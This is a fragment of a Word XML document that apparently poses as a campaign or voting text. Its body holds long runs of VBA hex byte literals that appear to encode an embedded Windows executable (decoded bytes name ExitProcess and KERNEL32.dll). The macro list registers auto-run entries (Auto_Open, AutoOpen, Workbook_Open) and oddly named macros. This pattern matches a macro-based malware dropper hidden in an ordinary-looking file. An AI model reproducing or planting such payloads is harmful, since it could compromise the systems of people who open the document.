        <w:t>&amp;H5F&amp;HF9&amp;HC5&amp;HDE&amp;H1D&amp;H21&amp;H15&amp;H92&amp;H46&amp;HA3&amp;H19&amp;H04&amp;HDE&amp;H5E&amp;H63&amp;H8C&amp;H69&amp;HBF&amp;H89&amp;H9B&amp;H65&amp;HD8&amp;H7C&amp;HF7&amp;H21&amp;H62&amp;H37&amp;H3A&amp;HD4&amp;H83&amp;HC2&amp;HC0&amp;H3C&amp;HFE&amp;H54&amp;H6F&amp;H9F&amp;H74&amp;HCE&amp;H34&amp;H06&amp;HB8&amp;H1B&amp;H0A&amp;HA9&amp;H64&amp;H3D&amp;HEF&amp;HCB&amp;H80&amp;H6D&amp;HDF&amp;HA4&amp;HE8&amp;H17&amp;H25&amp;H5E&amp;H27&amp;HD0&amp;H4D&amp;HA2&amp;HC6&amp;H1F&amp;H04&amp;HBB&amp;HB9&amp;HC9&amp;HB7&amp;HC8&amp;HCC&amp;HE4&amp;H65&amp;H65&amp;HBE&amp;HCB&amp;H94&amp;HAE&amp;H6A&amp;HC7&amp;HBA&amp;H2B&amp;H25&amp;H5D&amp;H68&amp;HE3&amp;HB4&amp;H10&amp;H0B&amp;HFC&amp;HCC&amp;HF4&amp;H48&amp;H72&amp;H6E&amp;HA1&amp;H46&amp;HC5&amp;H24&amp;H2E&amp;H09&amp;H4F&amp;H49&amp;HB5&amp;H87&amp;H7E&amp;H66&amp;HC1&amp;HE5&amp;H4F&amp;HE6&amp;HB6&amp;H44&amp;H25&amp;HB1&amp;H2A&amp;H49&amp;H10&amp;H8E&amp;H9C&amp;H5B&amp;H84&amp;H68&amp;H24&amp;H9F&amp;H9D&amp;H69&amp;H1A&amp;H13&amp;HB3&amp;H1F&amp;H16&amp;H83&amp;H25&amp;HDA&amp;HF5&amp;H04&amp;HA7&amp;HFF&amp;H37&amp;H62&amp;H83&amp;H52&amp;H16&amp;HD4&amp;H25&amp;HAB&amp;HC6&amp;H81&amp;HB8&amp;H63&amp;HD5&amp;H36&amp;H05&amp;H04&amp;HBB&amp;H14&amp;H21&amp;HF0&amp;HAC&amp;H91&amp;HFE&amp;H0B&amp;HA0&amp;H1E&amp;H5D&amp;H68&amp;H2E&amp;H74&amp;H3C&amp;HAF&amp;H73&amp;H92&amp;H14&amp;HA8&amp;H4F&amp;H07&amp;HED&amp;HF9&amp;H9C&amp;HC9&amp;HEC&amp;HEF&amp;H29&amp;H58&amp;H97&amp;H4A&amp;H43&amp;H86&amp;H0D&amp;H36&amp;HA7&amp;H95&amp;H0A&amp;HF2&amp;H7A&amp;H2F&amp;HEC&amp;H59&amp;HDB&amp;HC8&amp;H16&amp;HE2&amp;H76&amp;HFF&amp;HE0&amp;H06&amp;HCF&amp;HFD&amp;H71&amp;HB1&amp;H0F&amp;H3D&amp;H59&amp;H73&amp;HE9&amp;H6E&amp;H1C&amp;H3E&amp;H26&amp;HFA&amp;HAB&amp;H6E&amp;HC8&amp;H24&amp;HDB&amp;H6E&amp;H60&amp;HD0&amp;H60&amp;HDB&amp;H06&amp;HD7&amp;H8D&amp;H5F&amp;H92&amp;HC6&amp;H76&amp;HD3&amp;HB4&amp;H36&amp;H66&amp;H4F&amp;HAD&amp;H4C&amp;H25&amp;H80&amp;HB9&amp;HA9&amp;H99&amp;H54&amp;H09&amp;H31&amp;H08&amp;HBF&amp;HE0&amp;HA4&amp;H51&amp;H98&amp;H15&amp;H11&amp;H7A&amp;H94&amp;H6B&amp;H1C&amp;H33&amp;HFE&amp;H39&amp;H66&amp;H7C&amp;H4C&amp;H82&amp;H26&amp;H00&amp;HF1&amp;H21&amp;HCD&amp;H73&amp;H3B&amp;H6E&amp;H2A&amp;HB3&amp;HF3&amp;H53&amp;HCC&amp;H60&amp;HB2&amp;H1E&amp;H6C&amp;H59&amp;H58&amp;H56&amp;H68&amp;HC4&amp;H9F&amp;H4E&amp;H9E&amp;HF4&amp;H2F&amp;H51&amp;H7A&amp;HD4&amp;HCA&amp;H46&amp;H46&amp;HE9&amp;H52&amp;HC7&amp;H2D&amp;HD1&amp;HE9&amp;H78&amp;H85&amp;H6D&amp;H16&amp;HAB&amp;H1A&amp;H9C&amp;HB3&amp;HAB&amp;H82&amp;H42&amp;H89&amp;H35&amp;H89&amp;H6E&amp;HA0&amp;H12&amp;HC6&amp;H0F&amp;HEE&amp;H85&amp;HA9&amp;H2A&amp;HC5&amp;H40&amp;H8F&amp;HC4&amp;H8A&amp;H83&amp;H8B&amp;HBE&amp;HD3&amp;HE9&amp;H68&amp;HC5&amp;HEC&amp;H80&amp;H7B&amp;H56&amp;H54&amp;H36&amp;H11&amp;H81&amp;H03&amp;HE1&amp;H27&amp;H16&amp;H6E&amp;H9E&amp;H7C&amp;H62&amp;H91&amp;H85&amp;HA1&amp;HC8&amp;H94&amp;H0A&amp;H2D&amp;H6C&amp;H7B&amp;H8A&amp;H51&amp;H77&amp;H02&amp;HFA&amp;HC1&amp;HA1&amp;H22&amp;H11&amp;H4D&amp;H16&amp;H51&amp;H94&amp;H09&amp;HA6&amp;H0E&amp;H09&amp;H5D&amp;H3C&amp;HEE&amp;H53&amp;HB3&amp;HA5&amp;HD9&amp;HE2&amp;H69&amp;H27&amp;HA2&amp;H1B&amp;HCE&amp;H2D&amp;HB0&amp;H96&amp;H6C&amp;H42&amp;HC8&amp;H53&amp;H33&amp;HE7&amp;HE4&amp;HCA&amp;H13&amp;HEA&amp;H8A&amp;HF2&amp;H80&amp;HFD&amp;HF0&amp;H60&amp;HAA&amp;H58&amp;H53&amp;H17&amp;HB7&amp;HF3&amp;H2A&amp;H72&amp;H0C&amp;H0F&amp;H16&amp;H24&amp;H70&amp;H58&amp;H23&amp;HFB&amp;H77&amp;H57&amp;H7C&amp;HDF&amp;HAD&amp;H7A&amp;H10&amp;HCF&amp;H4C&amp;HAA&amp;HA0&amp;H64&amp;H63&amp;HB8&amp;H5C&amp;HF8&amp;H0C&amp;HC4&amp;H9B&amp;H80&amp;H5D&amp;HED&amp;H01&amp;H37&amp;H23&amp;HBC&amp;HE7&amp;HC0&amp;HF2&amp;HA1&amp;HA4&amp;H2B&amp;H51&amp;H76&amp;H01&amp;H9E&amp;HA7&amp;HAD&amp;HBC&amp;HC1&amp;H90&amp;H50&amp;H1A&amp;H11&amp;H2D&amp;H7B&amp;H91&amp;H19&amp;HCB&amp;HEC&amp;HDA&amp;HBA&amp;H63&amp;H8D&amp;H02&amp;H44&amp;H8D&amp;H92&amp;H0B&amp;HC1&amp;H26&amp;H87&amp;H9E&amp;H6A&amp;HEE&amp;HB2&amp;HDD&amp;H61&amp;H46&amp;H2C&amp;H08&amp;H19&amp;HA5&amp;H5F&amp;HB1&amp;H9B&amp;H72&amp;H35&amp;H8C&amp;H59&amp;HAE&amp;HDE&amp;H8F&amp;H75&amp;HFB&amp;H03&amp;H78&amp;HE6&amp;H2B&amp;H80&amp;HED&amp;H5C&amp;H0B&amp;H27&amp;H79&amp;H07&amp;H6E&amp;H9E&amp;H73&amp;HA2&amp;HD8&amp;HE0&amp;H5E&amp;H4C&amp;HB8&amp;H68&amp;HD1&amp;H76&amp;H13&amp;HA0&amp;H59&amp;HBB&amp;H11&amp;H0A&amp;HF0&amp;H60&amp;H86&amp;HA4&amp;H84&amp;H5F&amp;H82&amp;HDE&amp;HA4&amp;H31&amp;HB6&amp;HF3&amp;H94&amp;HA9&amp;H58&amp;H5B&amp;HC5&amp;HDA&amp;H92&amp;H04&amp;HB5&amp;H76&amp;H06&amp;HA7&amp;H3B&amp;HFD&amp;HF1&amp;H16&amp;HC7&amp;H3C&amp;H26&amp;H58&amp;HB4&amp;H03&amp;H5F&amp;H04&amp;HAF&amp;HC0&amp;H7F&amp;HDE&amp;H38&amp;H85&amp;H5F&amp;H19&amp;H8A&amp;HF1&amp;H30&amp;HF8&amp;HD0&amp;H75&amp;HD2&amp;H40&amp;H75&amp;HA0&amp;HE4&amp;HC4&amp;HBC&amp;HFA&amp;HCE&amp;H4B&amp;H20&amp;H35&amp;H66&amp;HE6&amp;HD4&amp;HF6&amp;H9E&amp;H4A&amp;H88&amp;H4E&amp;HC9&amp;H6E&amp;H04&amp;H55&amp;HEF&amp;H66&amp;H74&amp;HB2&amp;H6B&amp;H7F&amp;H51&amp;H46&amp;H07&amp;HAD&amp;H08&amp;H58&amp;H2C&amp;H97&amp;HC2&amp;HF2&amp;HF9&amp;HCC&amp;H74&amp;HEB&amp;HD0&amp;HA1&amp;H94&amp;H4F&amp;H45&amp;HE8&amp;H8F&amp;HF6&amp;H1F&amp;HF7&amp;HAD&amp;HBA&amp;HF9&amp;HF5&amp;H2D&amp;H8A&amp;H77&amp;H39&amp;HEB&amp;HC4&amp;H23&amp;H08&amp;HA6&amp;HC7&amp;H47&amp;H53&amp;H7D&amp;HA5&amp;H38&amp;H3B&amp;HEA&amp;H79&amp;H1C&amp;HE1&amp;HCF&amp;HD7&amp;HD4&amp;HEF&amp;H8A&amp;H78&amp;H55&amp;HF5&amp;H30&amp;H63&amp;HAD&amp;HBF&amp;HCF&amp;HAD&amp;H58&amp;HF3&amp;H0A&amp;HA8&amp;HA0&amp;HD9&amp;HB6&amp;HCE&amp;HC2&amp;H68&amp;HF3&amp;H67&amp;HC9&amp;H98&amp;H64&amp;H46&amp;H42&amp;H32&amp;H30&amp;H64&amp;H20&amp;H5E&amp;H62&amp;H24&amp;H04&amp;HCB&amp;HF0&amp;H6B&amp;HD7&amp;HF8&amp;HC1&amp;H19&amp;HEC&amp;H70&amp;H64&amp;H8C&amp;H9F&amp;H83&amp;H30&amp;H62&amp;H19&amp;H9D&amp;H1B&amp;H6D&amp;H8C&amp;H4D&amp;H6A&amp;H2C&amp;HA0&amp;HA1&amp;H6B&amp;HD2&amp;H06&amp;H0D&amp;HE1&amp;H15&amp;HE0&amp;H45&amp;H8D&amp;H3E&amp;H3D&amp;HAD&amp;H45&amp;HCD&amp;H6C&amp;H9A&amp;HBA&amp;H43&amp;HD7&amp;H5B&amp;H9E&amp;H89&amp;H2A&amp;H1E&amp;H7F&amp;HBB&amp;H7D&amp;H0D&amp;H7C&amp;H3F&amp;H74&amp;H7E&amp;H77&amp;H0E&amp;H55&amp;H54&amp;H8A&amp;H4E&amp;HA9&amp;HBF&amp;H9E&amp;HAF&amp;HD7&amp;HF0&amp;HF4&amp;HE6&amp;HF9&amp;HAB&amp;HAC&amp;H6D&amp;HE2&amp;H20&amp;H6E&amp;H9C&amp;HFE&amp;H8A&amp;H78&amp;HF1&amp;H26&amp;H2E&amp;H21&amp;H2F&amp;H00&amp;H05&amp;H33&amp;H64&amp;H19&amp;HDF&amp;H34&amp;HC7&amp;H67&amp;HEB&amp;HFF&amp;HF9&amp;HD6&amp;HA9&amp;H3A&amp;H9A&amp;HA0&amp;H99&amp;H16&amp;H32&amp;HB1&amp;HA0&amp;HF9&amp;H57&amp;H47&amp;HD4&amp;HC2&amp;H8C&amp;H8D&amp;HA2&amp;H55&amp;H32&amp;HC1&amp;HF9&amp;HCB&amp;H15&amp;HFA&amp;H68&amp;HFE&amp;HA0&amp;H15&amp;H20&amp;H77&amp;H7B&amp;H</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1B&amp;HBC&amp;HA3&amp;HAA&amp;H16&amp;HF2&amp;H28&amp;H09&amp;H5C&amp;HB4&amp;HE1&amp;H12&amp;H8C&amp;HEB&amp;H5B&amp;H90&amp;H0A&amp;H2E&amp;H86&amp;H4E&amp;H50&amp;HD8&amp;H3C&amp;HED&amp;H19&amp;H66&amp;HF2&amp;H06&amp;H87&amp;H5B&amp;H88&amp;H4F&amp;H2D&amp;H62&amp;H43&amp;HA5&amp;HEC&amp;H0B&amp;HFC&amp;H51&amp;HFB&amp;H99&amp;HB4&amp;H5E&amp;H82&amp;HC3&amp;H50&amp;H23&amp;H29&amp;H18&amp;H14&amp;H50&amp;HD4&amp;HD2&amp;H65&amp;H8A&amp;H74&amp;H36&amp;H90&amp;H79&amp;H34&amp;H42&amp;HCA&amp;H92&amp;HF1&amp;H6A&amp;H9E&amp;HD0&amp;H9C&amp;HDC&amp;H99&amp;H55&amp;HDD&amp;HF0&amp;HEC&amp;H36&amp;HF6&amp;H96&amp;H7B&amp;HDA&amp;H93&amp;H25&amp;HAF&amp;HE1&amp;H17&amp;H0E&amp;H73&amp;HED&amp;HC7&amp;HEE&amp;H7A&amp;H1D&amp;H65&amp;HEE&amp;H01&amp;HD0&amp;H06&amp;H62&amp;HDA&amp;H64&amp;H1B&amp;H34&amp;HB9&amp;H56&amp;H80&amp;H31&amp;H5E&amp;H25&amp;HA8&amp;H8E&amp;H82&amp;H25&amp;H75&amp;H10&amp;H8F&amp;H7F&amp;H4A&amp;HFC&amp;HE4&amp;H1C&amp;HE2&amp;H58&amp;HD5&amp;HAF&amp;HCD&amp;HD4&amp;H1A&amp;HB8&amp;HA9&amp;HAB&amp;H6A&amp;HD6&amp;HC6&amp;H72&amp;HCC&amp;H71&amp;HEA&amp;H9C&amp;H87&amp;HF9&amp;H5D&amp;HC9&amp;H2A&amp;H01&amp;HBD&amp;H83&amp;HE9&amp;H48&amp;H52&amp;H3F&amp;HC3&amp;HEB&amp;H63&amp;HC6&amp;HFD&amp;H33&amp;H5F&amp;H5F&amp;H8C&amp;H18&amp;HA3&amp;H6F&amp;HA1&amp;H6D&amp;H81&amp;HCE&amp;H1E&amp;H33&amp;H03&amp;HF2&amp;H5A&amp;H29&amp;HF1&amp;H45&amp;H03&amp;HC6&amp;HF0&amp;HE5&amp;HC1&amp;H36&amp;H9D&amp;HE5&amp;HDE&amp;HA2&amp;H80&amp;HF5&amp;H0B&amp;HD2&amp;HAF&amp;HDF&amp;HD1&amp;H0F&amp;H37&amp;H9D&amp;HDB&amp;H28&amp;H89&amp;H01&amp;HC3&amp;HC3&amp;HF4&amp;HC2&amp;H23&amp;HCC&amp;H86&amp;H69&amp;HE3&amp;HB2&amp;H47&amp;H7C&amp;HE4&amp;HE4&amp;H0C&amp;H05&amp;HB4&amp;H5D&amp;HE6&amp;HCE&amp;H98&amp;HC8&amp;H70&amp;HC3&amp;H24&amp;H6E&amp;H93&amp;HF0&amp;HB7&amp;H0B&amp;H8E&amp;H42&amp;HCA&amp;HC9&amp;H29&amp;HC8&amp;H32&amp;H94&amp;H29&amp;HF6&amp;HD0&amp;H9F&amp;H03&amp;H54&amp;HCB&amp;H82&amp;HD7&amp;HAC&amp;H20&amp;H8A&amp;HEB&amp;H97&amp;H40&amp;H96&amp;HFE&amp;H62&amp;H81&amp;HA4&amp;H90&amp;H8F&amp;H28&amp;H45&amp;H18&amp;HC8&amp;HBA&amp;H44&amp;HD1&amp;HDB&amp;H4E&amp;HE1&amp;H07&amp;H2B&amp;H1E&amp;HBA&amp;HB7&amp;HE3&amp;H6C&amp;H55&amp;H8C&amp;H0F&amp;H88&amp;H8F&amp;H03&amp;H9D&amp;H51&amp;H4D&amp;H52&amp;HFF&amp;H59&amp;HD2&amp;H48&amp;HB9&amp;HA1&amp;H5D&amp;H56&amp;HB3&amp;HAF&amp;H45&amp;H61&amp;H15&amp;HE0&amp;H72&amp;H0E&amp;H88&amp;H5C&amp;H8E&amp;HF7&amp;HE5&amp;H68&amp;HCA&amp;H95&amp;H94&amp;HB7&amp;H43&amp;HE3&amp;H6A&amp;H98&amp;HFC&amp;H3F&amp;H12&amp;H8C&amp;HA0&amp;HAE&amp;H64&amp;HB8&amp;HEA&amp;HC4&amp;H0D&amp;H91&amp;H10&amp;HEC&amp;H8D&amp;HDE&amp;H4F&amp;HFF&amp;H90&amp;H06&amp;H17&amp;HA8&amp;H47&amp;H20&amp;H85&amp;H7E&amp;H9A&amp;H96&amp;H56&amp;H6E&amp;H77&amp;H20&amp;H2F&amp;HF2&amp;H03&amp;HBB&amp;H89&amp;HD6&amp;HEC&amp;HB4&amp;H61&amp;HD1&amp;HB4&amp;H68&amp;H8A&amp;HD8&amp;H76&amp;HC4&amp;H1B&amp;H84&amp;HE5&amp;H81&amp;H5B&amp;H2F&amp;H93&amp;HDC&amp;HBC&amp;H8C&amp;H56&amp;HB5&amp;HB6&amp;H12&amp;HF0&amp;H85&amp;HE1&amp;H5B&amp;H4B&amp;H5D&amp;H6A&amp;H96&amp;HB7&amp;H68&amp;H39&amp;H4C&amp;H6F&amp;H8B&amp;H0B&amp;H45&amp;H1C&amp;H6B&amp;HB5&amp;HFD&amp;HFB&amp;H88&amp;H7B&amp;H9A&amp;H19&amp;HD8&amp;HE8&amp;HAF&amp;H8D&amp;HF0&amp;HAF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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C688F" w:rsidRDefault="00477CC7" w:rsidP="00477CC7">
      <w:r>
        <w:t>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2C&amp;H30&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H54&amp;H30&amp;H00&amp;H00&amp;H38&amp;H30&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H30&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H30&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H9C&amp;H00&amp;H45&amp;H78&amp;H69&amp;H74&amp;H50&amp;H72&amp;H6F&amp;H63&amp;H65&amp;H73&amp;H73&amp;H00&amp;H00&amp;H00&amp;H00&amp;H30&amp;H00&amp;H00&amp;H4B&amp;H45&amp;H52&amp;H4E&amp;H45&amp;H4C&amp;H33&amp;H32&amp;H2E&amp;H64&amp;H6C&amp;H6C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F9&amp;H8B&amp;HD5&amp;HEA&amp;H23&amp;H9E&amp;HED&amp;HBA&amp;HC7&amp;H67&amp;H64&amp;H65&amp;HA6&amp;HD2&amp;H54&amp;HC3&amp;H4B&amp;H01&amp;HEA&amp;HB9&amp;HB0&amp;H28&amp;H25&amp;H46&amp;HD1&amp;H37&amp;HCD&amp;H46&amp;HB2&amp;H5D&amp;H5E&amp;H09&amp;H49&amp;H72&amp;HA7&amp;HF7&amp;HF9&amp;HE0&amp;HD5&amp;HFF&amp;H24&amp;HB1&amp;HDE&amp;HF6&amp;H16&amp;H7B&amp;HD7&amp;H78&amp;HDD&amp;H7C&amp;H24&amp;H8E&amp;H7D&amp;HCB&amp;H41&amp;H9B&amp;H4B&amp;HF8&amp;HE2&amp;HF3&amp;H8C&amp;H2A&amp;HF3&amp;H5A</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005C688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CC7"/>
    <w:rsid w:val="00477CC7"/>
    <w:rsid w:val="005C688F"/>
    <w:rsid w:val="0067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477C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77C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77C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ampaignslogan">
    <w:name w:val="campaign__slogan"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00477C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77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77C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477C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77C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77C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ampaignslogan">
    <w:name w:val="campaign__slogan"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00477C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77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77CC7"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16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NEWMACROS.VOTINGS" wne:name="Project.NewMacros.votings" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTO_OPEN" wne:name="Project.NewMacros.Auto_Open" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.LLWYT12" wne:name="Project.NewMacros.Llwyt12" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.LLWYT13" wne:name="Project.NewMacros.Llwyt13" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.WORKBOOK_OPEN" wne:name="Project.NewMacros.Workbook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5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482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</w:div>
        <w:div w:id="5778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3012</Words>
  <Characters>17172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Якупов Нурбек Авасович</dc:creator>
  <cp:lastModifiedBy>Якупов Нурбек Авасович</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-10T22:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-10T22:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>